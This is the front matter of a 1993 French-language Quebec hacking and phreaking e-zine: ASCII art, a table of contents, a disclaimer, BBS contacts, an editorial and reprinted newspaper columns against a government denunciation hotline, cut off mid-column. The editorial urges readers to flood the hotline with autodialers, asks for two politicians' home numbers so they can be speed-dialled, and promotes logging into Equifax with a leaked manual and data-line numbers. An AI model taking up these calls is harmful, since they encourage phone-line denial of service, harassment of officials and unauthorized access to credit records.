Copy Link
Add to Bookmark
Report
Northern Phun Co Issue 04
ÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛßÛÛÛÜ ÛÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛßßß ÛÛÛÛßÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝÛÛÛÛ ÛÛÛÛ
ÞÛÛÛÛßÛÛÛÛ ÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛßßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÝ ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝ ÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝ ÛÛ
ÞÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÞÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßßßßßÛÛÛÛ ßßßßßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÜÛÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÜÛÛÛÛÜ ÜÛÛÛÜ
ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛ
ßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßß
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝ ÛÛÛÛÝ
-=A PREVIOUSLY UNKNOWN LIFESTYLE=-
25-02-93
Dans ce quatrime numro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÑÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
Ûº<SUJET> ³<AUTEUR> º
ÛéÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
ÛºTable des matires / Disclaimer ³-=ThE PoSSe=- º
Ûºditorial de NPC #4 ³Blitzkreig º
ÛºLe franc parler du vieux Mde ³Merlin l'Emmerdeur º
ÛºThe postman always quote twice ³Votre courrier º
ÛºLa scurit des rseaux ³Blitzkreig º
ÛºThe Bread Box ³-=ThE PoSSe=- º
ÛºPour payer ses comptes du Bell ³THX 1138 º
ÛºLes adieux de Predat0r ³Blitzkreig º
ÛºComment hacker les VMB ³Mental Floss º
ÛºHacker d'une forteresse ³Blitzkreig º
ÛºChrie, barre les portes on sort...³Santa Claus º
ÛºCrer des acomptes sur VAX ³SubHuman Punisher º
ÛºO sont passs tous les rebelles? ³Blitzkreig º
Ûºquifax et vous... ³Atreid Bevatron º
ÛºLes systmes du Bell ³Blitzkreig º
ÛºThe NPC song ³L0grus º
ÛºSmarts Drugs Redux ³Coaxial Karma º
ÛºNouveau systme pour les pompiers ³Blitzkreig º
ÛºSteve Jackson et Sun-Devil ³L0grus º
ÛºLa fabrication d'un warez ³Blitzkreig º
ÛºInitiation
DATAPAC ³Fairy Dust º
ÛºTrashing, Bell style ³-=ThE PoSSe=- º
ÛºLes ROLM-CBX ³Silicon Phreaker/UPIº
ÛºRead the news... ³-=ThE PoSSe=- º
ÛºFiction et compagnie ³Dynamix º
ÛÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÏÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
NPC are: Officiers Collaborateurs
Blitzkreig Santa Claus
Coaxial Karma Fairy Dust
Mental Floss Silicon Phreaker
Atreid Bevatron Merlin L'Emmerdeur
The SubHuman Punisher THX 1138
L0grus
Invit spcial
Dynamix
Greets to: Lost Avenger and the UPI gang
Knight Excalibur
Gengis Dan
Master Ninja (Passe moi le beurre)
DISCLAIMER - AVERTISSEMENT
Ce magazine n'est pas recommand aux gens qui portent un Pacemaker, aux
mes sensibles, et aux moralisateurs. Tenez-vous le pour dit, et abstenez-
vous!
Ceci va probablement tre le disclaimer le plus long de l'histoire des
magazines underground car, sur les conseils de gens gnralement bien
verss dans le domaine (vous savez que les avocats rclament 150$ de
l'heure? Chi!) une mise au point exhaustive doit tre faite avant de vous
permettre de poursuivre votre lecture (et non pas de poursuivre Northern
Phun Co.: vous tes pas drles!).
1) Tous les articles de ce magazine ne sont publis qu'
titre
d'information. L'application de une ou des technique(s) explique(s) dans
ces pages peuvent entraner la mort, des blessures srieuses,
l'impuissance, la perte de votre virginit, des poursuites judiciaires
embtantes, le bris de votre ordinateur, la nomination de Camil Samson
la tte du Parti Libral ou, pire encore, vous pourriez devenir comme vos
parents!
2) Northern Phun Co., qui est un organisme
but non-lucratif, avec une
vocation quasiment philanthropique, ne sera en aucun temps tenu pour
responsable de l'irresponsabilit des auteurs qui publient des articles
dans ces pages. L'entire responsabilit, et la preuve de la vracit
desdits articles, revient aux auteurs. On est mal parti, l
, les enfants...
3) Les officiers clairement identifis de Northern Phun Co. sont seuls
habilits
parler au nom du groupe, et NPC ne serait tre tenu pour
responsable de la conduite (ou de l'inconduite) des collaborateurs de NPC
sur les babs de la plante Terre. De plus, seuls les textes des officers
de Northern Phun Co. sont vrifis pour leur exactitude.
4) La lecture de Northern Phun Co., quoique rjouissante, peut entraner
aussi des problmes de sant mentale et des cas de pilosit manuelle (comme
pour la masturbation).
5) Northern Phun Co accepte,
priori, de publier tous les textes touchant
au H/P/C/A/V-et-le-reste qui lui seront soumis. NPC refusera, par contre,
tout texte encourageant la discrimination d'une ou des personne(s) en
fonction de leur origines ethniques, de leur religion ou de leur sexe. Si
vous voulez bouffer du ngre, engagez-vous plutt dans la police...
6) Northern Phun Co. tient
rappeler
ses lecteurs qu'il faut
soigneusement se brosser les dents aprs chaque repas. Et n'oubliez pas la
soie dentaire!
Est-ce que a suffit l
?
O nous rejoindre?
------------------
D la nature "volatile" de notre produit, les babs qui nous supportent le
sont tout aussi. Ceci dit:
Vous avez toutes les chances de pogner un des officiers de NPC sur les babs
PUBLICS suivants (on pousse la perversion jusque l
!).
Galaxy BBS : 418-628-5150
Light BBS : 418-651-5664
Wild BBS : 418-658-8939
Black Palace : 418-831-1602
Si votre babillard public (hors 418) dsire ouvrir une section NPC,
n'hsitez pas
nous contacter. C'est gratuit!
Nous sommes aussi (naturellement) sur les boards pirates de Qubec. En
fait, sur Workshop, il y a tous les officiers de NPC qui prennent un bain
de soleil... C'est comme qui dirait notre H.Q. underground. Alors, si vous
voulez venir y jeter un coup d'oeil, laissez un message sur une de nos VMB,
et on vous rappellera.
Nos sites officiels H/P hors-418 sont:
Silicon Valley 204-XXX-XXXX
The Works 617-XXX-XXXX
The Dial Up 514-XXX-XXXX
Brain Damage 819-XXX-XXXX
The Pentagon 416-XXX-XXXX
A Montral, NPC est aussi, officieusement, chez Metal Addiction, Cybernetic
Violence et Phrozen Realm, et plusieurs autres. Your best bet is...
Quelqu'un a parl de VMB? Essayez celle-i:
1-800-521-2070, code *169 (VMB)
Nous avons aussi deux adresses Internet pour e-mail:
subhuman@silicon.bison.mb.ca
tsp@works.UUCP
Un site FTP suivra trs bientt...
Et si malgr tout a vous n'tes pas capable de nous rejoindre, appelez
l'Arme du Salut, et demandez Roger...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
CE MAGAZINE EST COMMANDITE PAR BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
SPCIAL "CONSCIENCE SOCIALE"
A BAS LES CRAPULES!
------------------
DITORIAL
par
Blitzkreig
On va faire a sobrement, les amis.
Ouvrez les rangs.
Tendez les mains.
On distribue les couteaux...
a parle au diable! Dj
le numro quatre! Et quel numro! The best,
the biggest, and the wildest ever! C'est comme on vous le dit! Par la barbe
du prophte! La cl qui supporte mon point d'exclamation est barre!!!
Un drle de mois dans l'actualit, ce fvrier, non? On dirait que,
peu prs vers le temps o ils doivent payer les achats des ftes sur leurs
cartes de crdit, les politiciens dconnent. Frustration? Appt du gain?
Et le rsultat, c'est des conneries de lois TOTALEMENT aberrantes. Le
ministre Valcourt, par exemple, qui tente de faire passer sa nouvelle
politique sur le chmage... Permettez-moi de vous resservir une image use,
certes, mais oh! combien juste: le gouvernement a dcid que le meilleur
moyen de rgler le problme pineux chmage, c'tait de se dbarrasser des
chmeurs. Pas de s'en dbarrasser en leur trouvant des jobs, non. C'est
trop compliqu, a. En s'en dbarrassant purement et simplement. Un des
futurs projets que caresse le gouvernement est d'engager les Hell's Angels
comme sous-contractants: le fleuve va bientt tre rempli de cadavres de
chmeurs cousus dans des sacs de couchage...
J'exagre
peine, les kids. Della Noce, un sombre abruti dput du comt
de Duvernay, conservateur de surcrot,
eu la brillante ide de mettre sur
pied une ligne 800, pour encourager la population canadienne
jouer aux
dlateurs, et
dnoncer leurs voisins. Brillante ide! Comment n'y avait-
on pas pens plus tt? Bon sang, mais c'est bien sr! A quand les chambres
gaz? Pour plus de dtails, allez jeter un petit coup d'oeil
la fin de
cet ditorial. Il y a l
un petit billet de Jean V. Dufresne, et un autre
de Pierre Foglia, sur le sujet qui vous y attendent.
Bon, vous en avez pas assez de ces enfoirs qui jouent avec nos nerfs? Vous
voulez vraiment que notre peuple vire collabo, comme dans les jours les
plus sombres du nazisme, du communisme, et de tous les autres "ismes" qui
n'ont jamais eu pour but que de ravaler l'homme au rang de btail?
Aujourd'hui, on veut vous encourager
dnoncer vos frres, peu importe
qu'ils fraudent l'assurance-chmage ou pas. Demain, on va avoir une ligne
1-800 pour dnoncer le collgue de travail qui fume dans son bureau, une
autre pour dnoncer l'tudiant qui ne met pas de condom pendant ses
relations sexuelles, une autre pour dnoncer la mamie qui ose donner des
os de poulet
son chien, alors qu'il pourrait s'trangler, le pauvre...
C'est a que vous voulez? Vous n'aurez de cesse de jouer aux cafardeurs
tant qu'il n'y aura pas un numro pour dnoncer les dnonciateurs? Vous
allez mme appeler pour vous dnoncer aux autorits?
Non.
Je ne le crois pas.
A part quelques demeurs ici et l
, vous vous rvoltez comme nous lorsqu'on
vous parle de dlation sans motifs valables.
Le concert de protestations qui s'est lev
l'annonce de l'instauration
de cette "hot-line" a fait temporairement reculer les conservateurs. C'est
rassurant de voir qu'il reste encore des gens qui ont une certaine notion
de dcence, et qui n'hsitent pas
dnoncer le gouvernement lorsqu'il fait
des conneries (c.a.d. bien souvent). Le rsultat de ce toll: la ligne est
sur la glace. Pour combien de temps?
Alors, voici ce qu'on va faire, les touts petits: on va leur rendre la
monnaie de leur pice, on va vous garrocher ce numro 1-800, celui de la
ligne de dlation, s'il revient jamais dans le portrait, et vous allez
composer, les amis! Oh! Pas vous personnellement en personne, hon! Laissez
plutt votre ordi servir une leon aux politiciens. Un petit autodial
configur dans le sens du monde, une trentaine de jeunes qui dbutent, mais
qui ont du beat, et on est capable d'overloader toutes les nodes de cette
ligne odieuse! Pensez-y: si nous pouvons accaparer, 24 heures par jour, la
ligne de la honte, les vrais dlateurs -ces petits trons dgoulinants- ne
pourront pas vendre leurs voisins. Pas besoin de rpondre, non, il suffit
seulement que votre autodial soit configur pour composer le numro, et
composer, et composer. Lorsqu'il accroche la ligne, il raccroche
automatiquement et se remet
composer, composer, composer... C'est pas
illgal, a, les mecs, ce n'est pas un geste de dsobissance civile, ce
n'est pas un crime non plus, rien. Lorsqu'il y a des lections, les gens
manifestent leurs sentiments envers le gouvernement en allant voter. Entre
les lections, on parle avec nos pieds lorsqu'il y a une manifestation. Et
lorsqu'il y a un numro de tlphone qui incite des gens dcents et normaux
se comporter avec autant de moralit qu'un misrable vermisseau se
rfugiant sous une roche, on vote avec nos tlphones. Ds que le numro
est connu, les mecs, c'est promis, on vous le poste, et on vous enverra un
speed-dialer en prime, si vous n'en avez pas! Tiens, une dernire ide sur
le sujet: puisque Valcourt et Della Noce aiment tellement les tlphones,
on pourrait aussi les speed-dialer? Quelqu'un pourrait-il nous trouver
leurs numros
domicile? Ces enfls! Quand je pense qu'au provincial, un
simple dput comme cette enflure de Richard Holden possde un budget
DISCRTIONNAIRE (a veut dire qu'il
le droit de le dpenser n'importe
comment... et c'est ce qu'il fait, l'abruti!), un budget de 100 000$ par
anne! Je me demande quel est le budget discrtionnaire de Valcourt et de
Della Quasimodo? Il faut en buster des fraudeurs pour payer les dpenses
de ces gens-l
!
Je suis parti, l
, ne m'arrtez pas!
QUIFAX, maintenant: vous savez que cette compagnie de recouvrement possde
des dossiers sur plus de QUINZE millions de canadiens? Et c'est la manire
dont ils se les procurent qui est particulirement dgueulasse. Encore une
fois, allez jeter un coup d'oeil dans notre revue de presse... quifax sait
tout sur vous... et le vend sans aucun discernement au plus offrant. On
s'est dit qu'il serait temps que VOUS sachiez tout sur quifax... Ce n'est
que justice, votre honneur, j'invoque la lgitime dfense!
Non, srieusement, Atreid Bevatron vous a concoct un premier texte sur
Equifax. On a mis la main sur le manuel d'utilisation, section
"entreprises" et "citoyen", du systme informatis de cette compagnie,
ainsi que sur le numro de tlphone data d'quifax
Qubec! Nous
commenons ici
vous livrer, pieds et poings lis, ces informations! Soyez
prudents, et allez vrifier vos dossiers de crdit pour y voir les horreurs
qu'on y crit... et dites-vous que la plupart de vos concitoyens n'ont pas
la chance d'avoir les connaissances et la matrise de la technologie
ncessaires pour faire de mme. Pensez
eux lorsque vous loggerez, kids...
Ha! C'est vrai! Vous allez avoir besoin du "term" pour logger... Regardez
sur les babs undergrounds frquents par NPC: un petit cadeau va bientt
y apparatre, courtoisie de vos petits amis du North... avec un fichier en
prime, contenant tous les numros des lignes data d'Equifax
Qubec.
J'aurais bien le got de vous faire une monte de lait sur les grands
pollueurs, comme Tioxyde, qui menace de fermer son usine si on ne lui
permet pas de continuer
polluer impunment le St-Laurent. Voyons si les
couillons qui nous gouvernent vont se plier
ce chantage...
Mais pas de monte de lait, autrement: notre ex-felquiste prfr, Merlin
L'Emmerdeur est dj
pass l
avant moi. Ne manquez pas le deuxime volet
de sa srie sur la rsistance passive, qui suit immdiatement cet article.
Il y rpond d'ailleurs, avec plus de tact et d'esprit que je n'en aurai
jamais, aux dtracteurs de Northern Phun Co., ces bons petits diables...
Et pour le reste du magazine, plein de bonnes choses. On vous donne dj
plusieurs des outils dont vous aurez besoin pour aider le peuple
se
dbarrasser des crapules. Un texte, qui lui aussi fera date, sur le hack
des Voice Mail Box, de A
Z, par Mental Floss. C'est simple comme bonjour,
dudes. Vous pouvez facilement hacker 2 VMB par semaine, sans respirer. Mais
une VMB 800, c'est plus qu'un rpondeur tlphonique, les amis, a peut
aussi tre le PBX par excellence! En effet, l'utilisation des out-dials des
VMB suivront dans NPC #5...
Un texte de Coaxial Karma qui se veut la suite logique de mon article (voir
NPC #2) sur les smart drugs. Cette srie se poursuivra aussi dans NPC #5.
Un texte de The SubHuman Punisher sur les VAX.
Un texte de THX 1138 sur le civisme qui va encore vous faire jubiler, ou
vous faire rager, c'est selon.
Une visite de Santa Claus du Cybernetic Violence, un des Grands Boards dans
le 514, avec un indit de Bruce Sterling en prime!
Quelques petits textes de votre serviteur sur les rseaux et toute cette
sorte de choses. Et puis... un petit texte de Fairy Dust, une espce
d'intro sur les DATAPAC du Bell. C'est pas risqu de hacker
? En tous les
cas, c'est, nous dit-il, le premier texte d'une srie sur ces lignes
haute vitesse...
Logrus nous offre le premier volet d'une paire d'articles sur STEVE JACKSON
GAMES. Rappellons brivement que cette compagnie de jeux amricaines tait
passe au batte lors de l'opration Sun-Devil...
Beaucoup mieux... Northern Phun Co. -le mensuel- a rvis sa politique
ditoriale. Vous tenez le NOUVEAU NPC entre vos mains:
1) Fini le trash, le rag ou les mdisances
outrance sur les quelques
losers du 418. Nous comprenons que a peut devenir fatiguant,
la longue,
et que a laisse une mauvaise impression de la scne
Qubec
nos
lecteurs des autres rgions. Et puis, quand il s'agit de dtruire la
rputation d'un lame, on a maintenant PHUN WEEK ONLINE! Eh oui, pour les
lecteurs hors-418 qui ne seraient pas au courant, NPC a commenc
publier
un HEBDOMADAIRE, en plus du mensuel que vous tenez entre vos mains. Un
hebdo qui ne peut se d/l, et qui doit tre lu online (ou captur). Seules
les personnes visitant nos babs 418 peuvent se repatre de cette lecture!
Sorry guys!
2) Davantage d'articles "pointus" sur le phreaking, pour les connaisseurs
plus avancs. On va bien entendu garder un aspect "gnraliste", histoire
de ne pas abandonner les dbutants H/P, mais une grosse partie de ce mag
va tre TRES technique. Nous venons nous-mme du milieu du phreak, et c'est
notre coeur qui parle...
3) Northern Phun Co. n'est pas qu'un magazine de piratage! On l'a toujours
dit, on le rpte encore: il y a des gens qui sont plus durs de comprenure
que d'autres... CONTRE-CULTURE est le mot cl, ici, les amis. ACTIVISME
SOCIAL en est un autre. Capice?
4) Northern Phun Co. a dcid de s'associer avec les autres groupes
canadiens et amricains publiant des 'zines underground! Une entente a t
conclue entre UPI (United Phreakers International) et NPC pour l'change
de textes entre les deux parties. Attention! a ne veut pas dire qu'on va
publier des textes de UPI vieux de cinq ans, traduits en franais! Au
contraire! On parle ici de traduction et de publication SIMULTANE de
nouveaux textes. A preuve le texte prsent dans ce numro de Silicon
Phreaker, UPI du 514, qui ne paratra en anglais qu'
la fin avril...
Deux autres "joint-venture" sont prsentement
l'tape de la ngociation.
De plus, vos officiers NPC seront
la prochaine runion 2600
New-York,
le 6 mars prochain. On espre revenir de ce meeting, o se retrouvent
habituellement Emmanuel Goldstein et les plus fameux pirates de la cte
Est, avec des bonnes nouvelles!
-----------
Ct mauvaises nouvelles, il faut que vous sachiez que nous avons eu
quelques petits problmes avec des gens qui s'taient mis en tte de nous
dnoncer... Mais cei tant strictement un problme 418, on va pas vous
emmerder avec
... Qu'il nous suffise de dire que nous avons rapidement
rgl le problme, et sans effusion de sang, encore! Un rþit complet de
cette passionnante aventure devrait apparatre dans un des prochains PHUN
WEEK ONLINE.
C'est super buggant, la dlation, il ne faut pas se le cacher... C'est
super crtin aussi. Mais vous n'tes pas oblig de me croire, lisez les
journaux des dernires semaines...
Leeched from LE JOURNAL DE QUBEC - vendredi 12 fvrier 93
VALCOURT DLATEUR
par
Jean V. Dufresne
C'est le mtier le plus ignoble qui soit. Mais plus abjects encore sont
ceux qui encouragent la dnonciation anonyme, tel le ministre fdral
d'Emploi et immigration, qui propose l'tablissement d'une ligne
tlphonique officielle du gouvernement, gratuite et accessible
tous les
citoyens assez dgueulasse pour dnoncer leur voisins, qu'ils
souponneraient de frauder l'assurance-chmage.
Bernard Valcourt est d'accord pour faire de la dlation une politique
officielle de l'tat canadien.
Si je n'avais pas de sympathie
l'gard de ceux qui souhaitent
rehausser les critres de slection policire, je proposerais
cet homme
de se recycler en agent double.
Voil
o nous en sommes rendus avec la rforme de l'assurance-chmage.
On laisse maintenant aux dlateurs le soin de dbusquer ceux qui pourraient
abuser de la nouvelle loi, elle mme gnratrice des pires abus.
Or, la dlation, on c'est ce que c'est. Elle est faite de mesquinerie,
de vengeance, de jalousie, de rglements de comptes personnels. Elle
confre
n'importe quel citoyen canadien, sur la foi du moindre soupon,
sans preuve aucune, le pouvoir de dclencher une enqute policire sur un
coup de fil anonyme.
Vous voulez vous venger de votre locataire qui vous a tran devant
la Rgie du logement, de la voisine vivant de l'aide sociale, qui partage
son trois-pices avec son chum? Faites marcher vos doigts parce que le
numro de tlphone sera dans le bottin.
Et, en toute lchet, parce que la Commission d'assurance chmage vous
garantit l'anonymat. C'est ainsi que, en Europe, sous l'occupation nazie,
les collabos dnonaient les juifs.
La dlation, c'est le premier chanon de l'tat policier.
L'ide - et il s'en vante - mane de l'paisse cervelle du dput
conservateur de Duvernay, Vincent Della Noce, bien connu pour sa dfense
des "bedaines qutaines" de nos villgiateurs floridiens. Politiquement
adipeux, Della Noce.
Et suprmement malhonnte avec part a. Pour justifier son initiative,
il la compare
Info-Crime, un programme qui invite les citoyens
assister
la police dans la recherche des criminels.
On voit o il veut en venir, Valcourt: banaliser la dlation, en faire
un devoir civique, une obligation morale, susciter le frisson du hros,
chez ceux qui sont des lches.
Malhonnte, parce que Info-Crime, c'est autre chose que la dlation.
C'est la police qui a dj
fait enqute, c'est l'vad dj
condamn, c'est
le violeur dont on a perdu la trace. Ce n'est pas le chmeur mis
la
misre par un crtin de fonctionnaire bien bord dans la douillette de sa
permanence.
Ou de sa pension de dput, comme Della Noce.
Les consquences de la dlation? On va tourner les pauvres contre les
pauvres, parce que laissez-moi vous dire que les appels anonymes ne
viendront pas des hauteurs d'Outremont, mais des faubourgs du centre-sud.
Pas de Hamstead, mais de St-Jrome.
Et cet inconscient de Valcourt, se rend-il compte qu'il va aussi
tourner ces bons Canadiens de souche contre tous ceux qui ont la peau
fonce parce qu'il est acquis, n'est-ce pas, que ce sont les immigrants de
Hati et de Jamaque et les Vietnamiens et les Chinois qui viennent ici
vivre au crochet de nos impts?
- 30 -
Leeched from LA PRESSE - Lundi 15 fvrier 1993
LES PREDATEURS
par
Pierre Foglia
UNE LEPRE MDIOCRE
Dj
embarrasss par l'impopulaire rforme de l'assurance-chmage, les
dputs conservateurs se sont dpchs de demander
Vincent Della Noce de
